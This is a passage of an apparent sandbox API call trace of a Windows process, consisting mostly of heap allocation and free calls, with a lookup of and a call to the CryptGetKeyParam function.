(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0110.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0110.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0110.454] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0110.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0110.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0110.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0110.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0110.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0110.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0110.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0110.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0110.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0110.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0110.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0110.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0110.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0110.455] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0110.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0110.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0110.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0110.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0110.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0110.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0110.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0110.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0110.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0110.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0110.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0110.456] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0110.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0110.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0110.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0110.456] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0110.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0110.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0110.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0110.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0110.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0110.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0110.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0110.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0110.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0110.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0110.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0110.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0110.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0110.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0110.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0110.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0110.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0110.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0110.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0110.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0110.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0110.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0110.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0110.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0110.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0110.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0110.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0110.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0110.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0110.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0110.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0110.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0110.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0110.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0110.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0110.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0110.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0110.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0110.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0110.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0110.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0110.458] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0110.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0110.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0110.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0110.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0110.459] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0110.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0110.460] CryptGetKeyParam (in: hKey=0x41ac140, dwParam=0x7, pbData=0x43e2660, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2660*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0110.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0110.461] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0110.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0110.462] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0110.462] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | 